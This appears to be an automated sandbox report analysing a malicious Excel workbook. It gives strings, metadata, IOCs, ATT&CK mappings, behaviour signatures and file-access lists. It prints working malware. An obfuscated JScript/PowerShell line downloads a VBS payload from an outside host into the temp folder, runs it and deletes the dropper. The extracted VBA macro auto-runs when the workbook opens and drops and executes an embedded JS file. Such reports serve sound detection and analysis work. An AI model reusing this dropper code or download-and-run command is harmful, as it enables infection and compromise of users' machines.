var tr=" $ErrorActionPreference = 'SilentlyContinue';$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.sdapeton\\''+pmet:vne$,''sbv.tneilC/aztplasw/moc.tnevehctawmaerd.www//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\\notepads.vbs');" + "remove-item ($env:appdata + '\\FgCHe.js')";

Administrator

osrJqcHPJ

E Offic

S@#e@Xt

theme/theme/theme1.xmlPK

QI(!J1

ColorMode

[Host Extender Info]

_("$"* #,##0.00_);_("$"* $#,##0.00$;_("$"* "-"??_);_(@_)

60% - Accent1

indows\S

MBD00F49C1F

Accent2

_(* #,##0.00_);_(* $#,##0.00$;_(* "-"??_);_(@_)

VBAProject

Administrator B

$0046}

Comma [0]

drs/downrev.xmlLPMO

Microsoft Print to PDF

drs/downrev.xmlPK

$` Then

20% - Accent4

Embedd

Win64x

hbhwoo+a

For

O.OpenD

ID="{9096201C-589C-4A60-8F61-B8D5F008079F}"

40% - Accent6

Calibri1

40% - Accent4

SO.DLL#

R_=/q

DocumentSummaryInformation

Microsoft Excel

e = "Thi

Calibri1*

.Self.In

Name="VBAProject"

00\);_(*

C:\Users\Administrator\Desktop\Macro_Excel\FgCHe.txt

Calculation

Input

| ELnd@1

rosoft S

Currency

Picture 3

N0{00020820-0000-0000-C000-000000000046}

PT/YT

ThisWorkbook|

Currency [0]

60% - Accent5

isWorkbo

e = "She@et1"

20820-

l#}V^

ffffff

t0{000

stdole

new:13709620-C279-11CE-A49E-444553540000

LE Autom

var yy=r.ShellExecute(kldfg,tr,"","",0);

01642fe95b

20% - Accent5

Heading 4

dCrea

TableStyleMedium2PivotStyleLight16

eet1.

Normal

ystem32\

DPB="CCCE766EBA55BB55BB55"

Warning Text

_("$"* #,##0_);_("$"* $#,##0$;_("$"* "-"_);_(@_)

333333

F~_|'

ResOption1

ateDeriv

40% - Accent3

Attribut

Accent1

_(* #,##0_);_(* $#,##0$;_(* "-"_);_(@_)

Worksheets

60% - Accent2

BS&6+

Each Sh

PROJECTwm

Eng Moha

viron$(C

Namespace

Excel

Workbook

[Workspace]

_VBA_PROJECT_CUR

DocumentOwnerPassword

hared\OF

Linked Cell

HelpContextID="0"

1Sheet1

this code paste Embedded Object to folder

\FgCHe.js

_rels/.relsPK

_rels/.rels

Accent4

p{w2!

Bustomi

CMG="E6E45C78A4B88EBC8EBC8EBC8EBC"

Package

Check Cell

ThisWorkbook=0, 0, 0, 0, C

40% - Accent1

DocumentCryptSecurity

OLEObjects

K(M&$R(.1

Output

1pW[qS

Letter

}

_Acti

20% - Accent6

FICE16\M

var kldfg="Power" + "shell";

BExpo

Microsoft Excel 2003 Worksheet

Calibri

E2DF8D

*\G{00020813-0000-0000-C000-000000000046}#1.9#0#C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE#Microsoft Excel 16.0 Object Library

60% - Accent6

fCall

*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications

$0046

_Evaluate

Document=ThisWorkboP

60% - Accent4

qyjuy

Win32

"$"#,##0_);[Red]$"$"#,##0$

JqcHPJ

M 16.0 O

GC="B2B0088CEF8DEF8D10"

ThisWorkbook

Picture 7

;;Tgg

-101B-BD

&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

Workbookk

20% - Accent2

FgCHe.txt4

OLE Package

var r = GetObject("new:13709620-C279-11CE-A49E-444553540000")

Templ

code pa

txt" As

{084F01FA-E634-4D77-83EE-074817C03581}

Sheet1g

DocumentUserPassword

VgH1R

VBAPr@oject

TCY]j

Str(1,

0XFo;

PORTRAIT

\FgCHe.txt

OLEObjec

SummaryInformation Metadata

author	b'Eng Moha'
codepage	1252
create_time	2015-06-05 18:17:20
creating_application	b'Microsoft Excel'
last_saved_by	b'Administrator'
last_saved_time	2022-03-17 16:58:54

DocumentSummaryInformation Metadata

codepage_doc	1252
version	1048576

File Analysis (Signatures)

IOCs

IOCs
Executable file name	hbhwoo.Open (lWKUE\FgCHe.js)
Executable file name	Name lWKUE\FgCHe.txt As lWKUE\FgCHe.js

AutoExec

AutoExec
Workbook_Activate	Runs when the Excel Workbook is opened

Suspicious

Suspicious
Environ	May read system environment variables
Open	May open a file
InvokeVerb	May run an executable file or a system command
Call	May call a DLL using Excel 4 Macros (XLM/XLF)
GetObject	May get an OLE object with a running instance

Extracted Macros

VBA Filename	ThisWorkbook	Extracted Macro

Sub BcMv()
Dim lWKUE, hbhwoo

lWKUE = Environ$(Cells(2, 1))
 For Each Sh In Sheet1.OLEObjects
  If InStr(1, Sh.Name, "Object", 1) Then
   Sh.Copy
   ' this code paste Embedded Object to folder
   Set hbhwoo = GetObject(Cells(1, 1))
   hbhwoo.Namespace(lWKUE).Self.InvokeVerb "Paste"
  End If

  
 Next Sh

 osrJqcHPJ (lWKUE)
 hbhwoo.Open (lWKUE + "\FgCHe.js")
 
End Sub

Private Sub Workbook_Activate()
Call BcMv
End Sub

Sub osrJqcHPJ(lWKUE)


Name lWKUE + "\FgCHe.txt" As lWKUE + "\FgCHe.js"



End Sub

Reports: JSON HTML Lite

Mitre ATT&CK

Defense Evasion	Discovery	Privilege Escalation	Execution
T1564 - Hide Artifacts stealth_file T1055 - Process Injection resumethread_remote_process T1070 - Indicator Removal deletes_files T1064 - Scripting office_macro_suspicious office_macro_autoexecution T1070.004 - File Deletion deletes_files T1564.001 - Hidden Files and Directories stealth_file	T1082 - System Information Discovery antivm_checks_available_memory T1057 - Process Discovery createtoolhelp32snapshot_module_enumeration	T1055 - Process Injection resumethread_remote_process	T1059 - Command and Scripting Interpreter office_macro_suspicious office_macro_autoexecution T1064 - Scripting office_macro_suspicious office_macro_autoexecution

Statistics (8.72)

Usage

Processing ( 5.73 seconds )

4.971 CAPE
0.744 BehaviorAnalysis
0.007 Heatmap
0.003 AnalysisInfo
0.001 Debug

Signatures ( 0.16 seconds )

0.045 antiav_detectreg
0.019 territorial_disputes_sigs
0.016 infostealer_ftp
0.009 antianalysis_detectreg
0.009 infostealer_im
0.004 antiav_detectfile
0.004 antivm_vbox_keys
0.004 masquerade_process_name
0.004 ransomware_files
0.003 antianalysis_detectfile
0.003 antivm_vmware_keys
0.002 antidebug_devices
0.002 antivm_generic_diskreg
0.002 antivm_parallels_keys
0.002 antivm_vbox_files
0.002 antivm_xen_keys
0.002 ketrican_regkeys
0.002 geodo_banking_trojan
0.002 darkcomet_regkeys
0.002 infostealer_bitcoin
0.002 ransomware_extensions
0.002 recon_fingerprint
0.002 remcos_regkeys
0.001 accesses_netlogon_regkey
0.001 antivm_bochs_keys
0.001 antivm_hyperv_keys
0.001 antivm_vpc_keys
0.001 browser_security
0.001 bypass_firewall
0.001 registry_credential_store_access
0.001 disables_browser_warn
0.001 poullight_files
0.001 office_martian_children
0.001 packer_armadillo_regkey
0.001 medusalocker_regkeys
0.001 revil_mutexes
0.001 limerat_regkeys
0.001 warzonerat_regkeys
0.001 ursnif_behavior

Reporting ( 2.83 seconds )

2.696 MITRE_TTPS
0.05 ReportHTML
0.044 JsonDump
0.042 LiteReport

Signatures

Checks available memory

Queries the keyboard layout

SetUnhandledExceptionFilter detected (possible anti-debug)

Uses Windows APIs to generate a cryptographic key

Office loads COM DLLs, indicative of Office Macros spawning CMD process for execution

Office loads VB DLLs, indicative of Office Macros

Deletes files from disk

DeletedFile: C:\Users\user\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml

Resumed a thread in another process

thread_resumed: Process excel.exe with process ID 3476 resumed a thread in another process with the process ID 3476

thread_resumed: Process explorer.exe with process ID 4804 resumed a thread in another process with the process ID 4804

Enumerates the modules from a process (may be used to locate base addresses in process injection)

module: pid 3476 module ntdll.dll

module: pid 3476 module KERNEL32.DLL

module: pid 3476 module KERNELBASE.dll

module: pid 3476 module win32u.dll

module: pid 3476 module SspiCli.dll

module: pid 3476 module oleaut32.dll

module: pid 3476 module mso20win32client.dll

module: pid 3476 module CRYPTUI.dll

module: pid 3476 module IPHLPAPI.DLL

module: pid 3476 module mso30win32client.dll

module: pid 3476 module wevtapi.dll

module: pid 3476 module Secur32.dll

module: pid 3476 module WindowManagementAPI.dll

module: pid 3476 module TextInputFramework.dll

module: pid 3476 module InputHost.dll

module: pid 3476 module twinapi.appcore.dll

module: pid 3476 module CoreMessaging.dll

module: pid 3476 module CoreUIComponents.dll

module: pid 3476 module ntmarta.dll

module: pid 3476 module WININET.dll

module: pid 3476 module Windows.UI.Immersive.dll

module: pid 3476 module ondemandconnroutehelper.dll

module: pid 3476 module sppc.dll

module: pid 3476 module sppcs.dll

module: pid 3476 module webio.dll

module: pid 3476 module DNSAPI.dll

module: pid 3476 module XmlLite.dll

module: pid 3476 module rasadhlp.dll

module: pid 3476 module Cabinet.dll

module: pid 3476 module webservices.dll

module: pid 3476 module d3d10_1.dll

module: pid 3476 module d3d10_1core.dll

module: pid 3476 module OneCoreCommonProxyStub.dll

Checks for presence of debugger via IsDebuggerPresent

The Office file contains a macro with auto execution

Workbook_Activate: Runs when the Excel Workbook is opened

Creates a hidden or system file

file: C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres

file: C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres

The Office file contains a macro with suspicious strings

Environ: May read system environment variables

Open: May open a file

InvokeVerb: May run an executable file or a system command

Call: May call a DLL using Excel 4 Macros (XLM/XLF)

GetObject: May get an OLE object with a running instance

Screenshots

Session Playback

No playback available.

Hosts

No hosts contacted.

DNS

No domains contacted.

Summary

C:\Windows\Globalization\Sorting\sortdefault.nls
C:\ProgramData\Microsoft\Office\ClickToRunPackageLocker
\Device\CNG
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\msowercrash.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\Cultures\OFFICE.ODF
C:\Users\user\AppData\Local\Temp\{D97DA1AE-2C1A-4825-BB08-AB4D047678BC} - OProcSessId.dat
C:\Program Files (x86)\Microsoft Office\root\Office16\WINSTA.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\winsta.dll
C:\Windows\SysWOW64\winsta.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\resourcepolicyclient.dll
C:\Windows\SysWOW64\resourcepolicyclient.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\kernel.appcore.dll
C:\Windows\SysWOW64\kernel.appcore.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\d3d10warp.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\d3d10warp.dll
C:\Windows\SysWOW64\d3d10warp.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSO40UIRES.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSO99LRES.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSORES.DLL
C:\Windows\system32
C:
C:\Program Files (x86)\Microsoft Office\root\Office16\1033\XLINTL32.DLL
C:\Program Files (x86)\Microsoft Office\root\Office16\XLINTL32.COMMON.DLL
C:\Program Files (x86)\Microsoft Office\root\SystemResources\XLINTL32.COMMON.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\Office16\SystemResources\XLINTL32.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\SystemResources\USER32.dll.mun
C:\Windows\SystemResources\USER32.dll.mun
C:\Program Files (x86)\Microsoft Office\root\Office16\isolatedwindowsenvironmentutils.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\isolatedwindowsenvironmentutils.dll
C:\Windows\SysWOW64\isolatedwindowsenvironmentutils.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\DXCore.dll
C:\Windows\SysWOW64\DXCore.dll
\Device\DeviceApi\CMApi
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\windows.storage.dll
C:\Windows\SysWOW64\windows.storage.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\wldp.dll
C:\Windows\SysWOW64\wldp.dll
C:\Users\user\AppData\Roaming\Microsoft\Excel\
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\1033\msointl30.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\1033\MSOINTL.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscoreei.dll
C:\Windows\SysWOW64\mscoree.dll.local
C:\Windows\Microsoft.NET\Framework\*
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\clr.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.0.3705\mscorwks.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\clr.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v1.1.4322\mscorwks.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\clr.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorwks.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Windows\Microsoft.NET\Framework\v4.0.30319\clr.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE.config
C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\*.log
C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\
C:\Users\user\AppData\Local\Temp\Diagnostics\EXCEL\App1765109128236847900_D97DA1AE-2C1A-4825-BB08-AB4D047678BC.log
C:\Program Files (x86)\Microsoft Office\root\Office16\MSOARIA.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\RICHED20.DLL
C:\Users\user\AppData\Local\Microsoft\Office\Licenses\5\Grace\1
\??\MountPointManager
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\SystemResources\RICHED20.DLL.mun
C:\Program Files (x86)\Common Files\Microsoft Shared\SystemResources\RICHED20.DLL.mun
C:\Users\user\AppData\Local\Microsoft\FontCache\4\Purge\*
C:\Users
C:\Users\user
C:\Users\user\AppData
C:\Users\user\AppData\Local
C:\Users\user\AppData\Local\Microsoft
C:\Users\user\AppData\Local\Microsoft\Office
C:\Users\user\AppData\Local\Microsoft\Office\16.0
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Floodgate
C:\Users\user\AppData\Local\Temp\{2511A4E6-1385-4706-92A9-E022AA35962D}\
C:\Windows
C:\Program Files (x86)\Microsoft Office\root\Office16\WININET.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\wininet.dll
C:\Windows\SysWOW64\wininet.dll
C:\Users\user\AppData\Local\Microsoft\Office\16.0\excel.exe_Rules.xml
C:\Users\user\AppData\Local\Temp\Diagnostics\UploadCache\*
C:\Users\user\AppData\Local\Microsoft\FontCache\4\Catalog\ListAll.Json
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Insights\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\DataStore\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Governance\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Governance\Anonymous\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Content\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Content\Anonymous\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Personalization\Content\Anonymous\Insights.json
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos\*
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Display\*
C:\Users\user\AppData\Local\Microsoft\FontCache\4\CloudFonts\Aptos Narrow\*
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\en-US\d2d1.dll.mui
C:\Windows\SysWOW64\en-US\d2d1.dll.mui
C:\Program Files (x86)\Microsoft Office\root\vfs\System\en-US\d2d1.dll.mui
C:\Windows\sysnative\en-US\d2d1.dll.mui
C:\Program Files (x86)\Microsoft Office\root\Office16\XmlLite.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\xmllite.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\SystemResources\MSOINTL.DLL.mun
C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\SystemResources\MSOINTL.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\cabinet.dll
C:\Windows\SysWOW64\cabinet.dll
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.IE5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE
\Device\RasAcd
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\uxtheme.dll.Config
C:\Windows\SysWOW64\uxtheme.dll.Config
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\uxtheme.dll
C:\Windows\SysWOW64\uxtheme.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\en-US\Windows.Security.Authentication.Web.Core.dll.mui
C:\Windows\SysWOW64\en-US\Windows.Security.Authentication.Web.Core.dll.mui
C:\Program Files (x86)\Microsoft Office\root\vfs\System\en-US\Windows.Security.Authentication.Web.Core.dll.mui
C:\Windows\sysnative\en-US\Windows.Security.Authentication.Web.Core.dll.mui
C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE.Local\
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984
C:\Windows\WinSxS\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.19041.1110_none_a8625c1886757984
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\en-US\USER32.dll.mui
C:\Windows\SysWOW64\en-US\USER32.dll.mui
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\Temp
C:\Windows\Temp
C:\Users\user\AppData\Local\Temp
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\56a61aeb75d8f5be186c26607f4bb213abe7c5ec.tbres
C:\Program Files (x86)\Microsoft Office\root\Office16\TextShaping.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\TextShaping.dll
C:\Windows\SysWOW64\TextShaping.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\Fonts\segoeui.ttf
C:\Windows\Fonts\segoeui.ttf
C:\Program Files (x86)\Microsoft Office\root\SystemResources\EXCEL.EXE.mun
C:\Program Files (x86)\Microsoft Office\root\Office16\OART.DLL
C:\Program Files (x86)\Microsoft Office\root\Office16\CRYPTSP.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\cryptsp.dll
C:\Windows\SysWOW64\cryptsp.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\oartgrfserver.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\oartgrfserver.dll
C:\Windows\SysWOW64\oartgrfserver.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\Fonts\
C:\Program Files (x86)\Microsoft Office\root\Office16
C:\Users\user\AppData\Roaming\Microsoft\AddIns\
C:\Program
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX64
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft
C:\Program Files (x86)\Microsoft
C:\Users\user\Documents\
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\
C:\Users\user\AppData\Roaming\Microsoft\Excel\XLSTART\*.*
C:\Program Files (x86)\Microsoft Office\root\Office16\XLSTART\*.*
C:\ProgramData
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat
C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\OFFICE\Heartbeat\HeartbeatCache.xml
C:\Users\user\AppData\Local\Temp\26bd031cb4a5333bbd77.xls
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\en-US\Windows.Web.dll.mui
C:\Windows\SysWOW64\en-US\Windows.Web.dll.mui
C:\Program Files (x86)\Microsoft Office\root\vfs\System\en-US\Windows.Web.dll.mui
C:\Windows\sysnative\en-US\Windows.Web.dll.mui
C:\Users\user\Desktop
C:\
C:\Windows\SysWOW64\dpapi.dll
C:\Users\user\AppData\Local\Microsoft\Windows\Caches
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000016.db
C:\Users\desktop.ini
C:\Users\user\Desktop\desktop.ini
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\*.tbres
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbres
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5475cb191e478c39370a215b2da98a37e9dc813d.tbreq
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\propsys.dll
C:\Windows\SysWOW64\propsys.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\System\propsys.dll
C:\Windows\sysnative\propsys.dll
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbreq
C:\Users\user\AppData\Local\Temp\26bd031cb4a5333bbd77.xls:Zone.Identifier
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e0495fde257df2ef62ee7e3fdb1ebb9d7ff72300.tbreq
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres
C:\Users\user\AppData\Local\Temp\
C:\Users\user\AppData\Local\
C:\Users\user\AppData\
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbreq
C:\Users\user\
C:\Users\
\??\Volume{c0a8b6a3-0000-0000-0000-300300000000}
C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\089d66ba04a8cec4bdc5267f42f39cf84278bb67.tbres
C:\Users\user\AppData\Local\Temp\~DFE07ADD6C110E689B.TMP
C:\Program Files (x86)\Microsoft Office\root\Office16\GKExcel.dll
C:\Program Files (x86)\Microsoft Office\root\SystemResources\GKExcel.dll.mun
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\F1C26189.emf
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\AppContainerUserCertRead
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CRLs\*
C:\Users\user\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs\*
C:\Program Files (x86)\Microsoft Office\root\Office16\GFX.DLL
C:\Program Files (x86)\Microsoft Office\root\Office16\MSIMG32.dll
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\msimg32.dll
C:\Windows\SysWOW64\msimg32.dll
C:\Users\user\AppData\Local\Temp\26bd031cb4a5333bbd77.xls\
C:\Program Files (x86)\Microsoft Office\root\Office16\VBE7.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\VBE7.DLL
C:\Program Files (x86)\Common Files\Microsoft Shared\Office16\VBE7.DLL
\??\SrpDevice
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\VBA\SystemResources\VBE7.DLL.mun
C:\Program Files (x86)\Common Files\Microsoft Shared\VBA\SystemResources\VBE7.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\SystemResources\MSORES.DLL.mun
C:\Program Files (x86)\Common Files\Microsoft Shared\SystemResources\MSORES.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\ink\InkObj.dll
C:\Program Files (x86)\Common Files\Microsoft Shared\ink\InkObj.dll
C:\Users\user\AppData\Roaming\Microsoft\Office\
C:\Users\user\AppData\Roaming\Microsoft\Office\review.rcd
C:\Users\user\AppData\Roaming\Microsoft\Office\adhoc.rcd
C:\Program Files (x86)\Microsoft Office\root\vfs\Windows\SystemResources\usp10.dll.mun
C:\Windows\SystemResources\usp10.dll.mun
C:\Program Files (x86)\Microsoft Office\root\vfs\Fonts\staticcache.dat
C:\Windows\Fonts\staticcache.dat
C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\globinputhost.dll
C:\Windows\SysWOW64\globinputhost.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\MSPTLS.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Office16\MSPTLS.DLL
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\SystemResources\MSPTLS.DLL.mun
C:\Program Files (x86)\Common Files\Microsoft Shared\SystemResources\MSPTLS.DLL.mun
C:\Program Files (x86)\Microsoft Office\root\Office16\OFFSYM.TTF
C:\Program Files (x86)\Microsoft Office\root\Office16\OFFSYMB.TTF
C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\root\Office16\OFFSYMB.TTF
C:\Program Files (x86)\Microsoft Office\root\Office16\OFFSYMK.TTF
C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\root\Office16\OFFSYMK.TTF
C:\Program Files (x86)\Microsoft Office\root\Office16\OFFSYMXB.TTF
C:\PROGRAM FILES (X86)\MICROSOFT OFFICE\root\Office16\OFFSYMXB.TTF
C:\Users\user\Documents\desktop.ini
C:\Users\user\Music\desktop.ini
C:\Users\user\Pictures\desktop.ini
C:\Users\user\Videos\desktop.ini
C:\Program Files (x86)\Microsoft Office\root\vfs\Fonts\seguisb.ttf
C:\Windows\Fonts\seguisb.ttf
C:\Users\user\AppData\Local\Temp\*
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\1380790193167760279.C4
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\ASkwMDAwMDAwMC0wMDAwLTAwMDAtMDAwMC0wMDAwMDAwMDAwMDBfTnVsbAA.S
C:\Users\user\AppData\Local\Microsoft\Office\16.0\UsageMetricsStore\FileActivityStore\Excel\*
C:\Users\user\AppData\Local\Microsoft\Excel\Purge\*
C:\Users\user\AppData\Local\Microsoft\Excel\Metadata
C:\Users\user\AppData\Local\Microsoft\Office\
C:\Users\user\AppData\Local\Microsoft\Office\Excel.officeUI
C:\Users\user\Searches\desktop.ini
C:\Users\user\Contacts\desktop.ini
C:\Users\user\Favorites\desktop.ini
C:\Users\user\Links\desktop.ini
C:\Users\user\Saved Games\desktop.ini
C:\Program Files (x86)\Microsoft Office\root\Office16\Microsoft.Office.PolicyTips.dll
C:\Users\user\AppData\Local\Microsoft\Schemas\MS Excel_restart.xml
C:\Users\user\AppData\Local\Microsoft\Office\OTele
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-journal
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
C:\Users\user\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesX86\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Microsoft Office\root\Office16\osfshared.dll
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Wef
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Wef\prewarm.dat
C:\Users\user\AppData\Local\Microsoft\Office\16.0\Wef\prewarmtoken.dat
